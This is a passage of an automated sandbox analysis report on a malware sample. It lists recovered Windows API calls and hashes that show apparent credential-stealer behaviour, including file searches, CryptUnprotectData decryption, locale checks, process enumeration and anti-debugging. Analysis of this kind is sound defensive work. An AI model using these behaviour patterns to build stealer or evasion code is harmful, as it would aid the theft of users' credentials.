                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 00B2F985
                                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 00B2F9D6
                                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 00B2F9EC
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B2FD18
                                                  • FindClose.KERNEL32(000000FF), ref: 00B2FD2A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID:
                                                  • API String ID: 3334442632-0
                                                  • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                  • Instruction ID: 421617ebc9faab2918a9f116d5f044ccb5af1e8f71a18243e81b94c32b0d0061
                                                  • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                  • Instruction Fuzzy Hash: 19B14372900218ABCB24FF64DD96FEE73B9AF55301F6081E9A44A56191EF305B48CF92
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                                  • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                                  • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                  • String ID: \*.*$@
                                                  • API String ID: 433455689-2355794846
                                                  • Opcode ID: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                                  • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                                  • Opcode Fuzzy Hash: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                                  • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                                  APIs
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 00B21B8A
                                                  • StrCmpCA.SHLWAPI(?,0042526C), ref: 00B21BDA
                                                  • StrCmpCA.SHLWAPI(?,00425314), ref: 00B21BF0
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B21FA7
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B22031
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B22087
                                                  • FindClose.KERNEL32(000000FF), ref: 00B22099
                                                    • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                    • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                  • String ID:
                                                  • API String ID: 1415058207-0
                                                  • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                  • Instruction ID: 71f0089a09b58d478e63328ee02ce85c8adc06c00afcacc9b81126a303e784e8
                                                  • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                  • Instruction Fuzzy Hash: 01122E72910218ABCB19FB60DD96EEDB3B9AF55700F7045D9B14A62091EF306F88CF51
                                                  APIs
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 00B2E0C5
                                                  • StrCmpCA.SHLWAPI(?,004214C8), ref: 00B2E115
                                                  • StrCmpCA.SHLWAPI(?,004214CC), ref: 00B2E12B
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B2E647
                                                  • FindClose.KERNEL32(000000FF), ref: 00B2E659
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 2325840235-0
                                                  • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                  • Instruction ID: 10c229e5918cf4170632c72c0d8f54e25ee9757de722b4aa4e83ee9b0f8ba69c
                                                  • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                  • Instruction Fuzzy Hash: 91F1D472510218ABCB19FB60DD95EEEB3B9AF15701FB051D9B05A620A1EF306F88CF51
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                                  • LocalFree.KERNEL32(00000000), ref: 00417D22
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                  • String ID: /
                                                  • API String ID: 3090951853-4001269591
                                                  • Opcode ID: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                  • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                                  • Opcode Fuzzy Hash: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                  • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                                  APIs
                                                  • memset.MSVCRT ref: 0040C853
                                                  • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00867180), ref: 0040C871
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                  • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                  • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                  • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                  • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                  • String ID:
                                                  • API String ID: 1498829745-0
                                                  • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                  • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                                  • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                  • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                                  APIs
                                                  • memset.MSVCRT ref: 00B2CABA
                                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B2CAD8
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B2CAE3
                                                  • memcpy.MSVCRT(?,?,?), ref: 00B2CB79
                                                  • lstrcat.KERNEL32(?,00420B46), ref: 00B2CBAA
                                                  • lstrcat.KERNEL32(?,00420B47), ref: 00B2CBBE
                                                  • lstrcat.KERNEL32(?,00420B4E), ref: 00B2CBDF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                  • String ID:
                                                  • API String ID: 1498829745-0
                                                  • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                  • Instruction ID: 8f4d99d24b67df89bde49f02e9081202fbe2298eb80436354d65a972e07e5932
                                                  • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                  • Instruction Fuzzy Hash: 9B41507894422DEFDB10DFD0ED89BEEBBB8FB44304F1045A8E509A6280D7745A84CF91
                                                  APIs
                                                  • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,00867190,?,0042110C,?,00000000,?), ref: 0041696C
                                                  • sscanf.NTDLL ref: 00416999
                                                  • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,00867190,?,0042110C), ref: 004169B2
                                                  • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00867190,?,0042110C), ref: 004169C0
                                                  • ExitProcess.KERNEL32 ref: 004169DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Time$System$File$ExitProcesssscanf
                                                  • String ID: B
                                                  • API String ID: 2533653975-2248957098
                                                  • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                  • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                                  • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                  • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                                  APIs
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                  • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BinaryCryptLocalString$AllocFree
                                                  • String ID: N@
                                                  • API String ID: 4291131564-4229412743
                                                  • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                  • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                                  • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                  • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                                  APIs
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00B37E48
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00B37E60
                                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00B37E74
                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B37EC9
                                                  • LocalFree.KERNEL32(00000000), ref: 00B37F89
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                  • String ID:
                                                  • API String ID: 3090951853-0
                                                  • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                  • Instruction ID: 6564c10d88340a2bad400b441f8e494188d3903f56df2c9de2b0bbcff6fb8fc4
                                                  • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                  • Instruction Fuzzy Hash: 884139B2940228ABCB24DB94DC89FEDB7B8FB45700F3041D9E009A6191DB742F85CFA1
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                                  • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                                  • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                  • String ID:
                                                  • API String ID: 2579439406-0
                                                  • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                  • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                                  • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                  • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 00B3BE09
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B3BE1E
                                                  • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 00B3BE29
                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00B3BE45
                                                  • TerminateProcess.KERNEL32(00000000), ref: 00B3BE4C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                  • String ID:
                                                  • API String ID: 2579439406-0
                                                  • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                  • Instruction ID: 584a8685e8a3750ec6af3ba37e34e652b79d75b91f44fcd6230c22b8c0abfdc0
                                                  • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                  • Instruction Fuzzy Hash: 6921A3BC9002059FDB14DF69F889A963BE4FB0A315F50407AE90987265EBB05981EF49
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                  • String ID:
                                                  • API String ID: 3657800372-0
                                                  • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                  • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                                  • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                  • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00B274B4
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B274BB
                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00B274E8
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00B2750B
                                                  • LocalFree.KERNEL32(?), ref: 00B27515
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                  • String ID:
                                                  • API String ID: 2609814428-0
                                                  • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                  • Instruction ID: 209d6596fd5358c6505e91bb7ddf907c5929fec50edcc8d3568e848e0573de5d
                                                  • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                  • Instruction Fuzzy Hash: A0011275B80208BFEB10DFD4DD45F9D77B9EB44704F104155F705AB2C0DA70AA008B65
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                                  • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                                  • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                                  • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                  • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                                  • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                  • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B39885
                                                  • Process32First.KERNEL32(00420ACA,00000128), ref: 00B39899
                                                  • Process32Next.KERNEL32(00420ACA,00000128), ref: 00B398AE
                                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00B398C3
                                                  • CloseHandle.KERNEL32(00420ACA), ref: 00B398E1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                  • Instruction ID: 1ad1d9a271b374f13060621a3394ec28463fded74aeb28a8fdde89fbe3bf4d54
                                                  • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                  • Instruction Fuzzy Hash: 45014C79A40208FFDB20DFE4CC94BEDB7F9EB49740F1041C9A505A6240D7749A44CF51
                                                  APIs
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                    • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                    • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
